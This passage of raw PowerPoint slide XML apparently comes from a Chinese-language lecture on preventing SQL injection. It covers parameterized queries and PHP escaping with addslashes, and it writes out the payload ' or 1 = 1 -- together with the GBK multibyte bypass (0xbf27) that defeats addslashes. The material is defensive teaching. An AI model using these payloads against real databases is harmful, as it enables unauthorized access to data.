                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dbConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.Parameters.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", Request[“user”] ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.Parameters.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", Request[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”] ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.ExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在使用参数化查询的情况下，数据库服务器不会将参数的内容视为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>指令的一部份来处理，而是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在数据库完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令的编译后，才套用参数运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，因此就算参数中含有恶意的指令，由于已经编译完成，就不会被数据库所运行。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0662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3250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="421554"/>
            <a:ext cx="7772400" cy="645246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>字符转义函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333251" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1333573"/>
            <a:ext cx="8382000" cy="5095730"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>PHP:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or 1 = 1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数返回在预定义字符之前添加反斜杠的字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:    “  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>问题：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>编码攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:   (GBK) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>$user =  0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> ($user)     0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>bf 5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>正确的实现方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>该函数转义 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句中使用的字符串中的特殊字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333258" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5753483" y="2362200"/>
            <a:ext cx="1433406" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333259" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5746317" y="2922663"/>
            <a:ext cx="2049419" cy="424726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>¿′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1333254" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="65089" t="48508" r="31905" b="48581"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="3540048"/>
            <a:ext cx="653521" cy="467053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333260" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5746317" y="3483126"/>
            <a:ext cx="2302233" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>bf 5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333264" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5746317" y="2362200"/>
            <a:ext cx="2966802" cy="1738312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="CC3300"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747259" y="6457890"/>
            <a:ext cx="6934200" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bbs.ichunqiu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/thread-10899-1-1.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE63CA4B-6C9C-4B25-B45A-0F4564BF636A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7335819" y="2393129"/>
            <a:ext cx="1377300" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
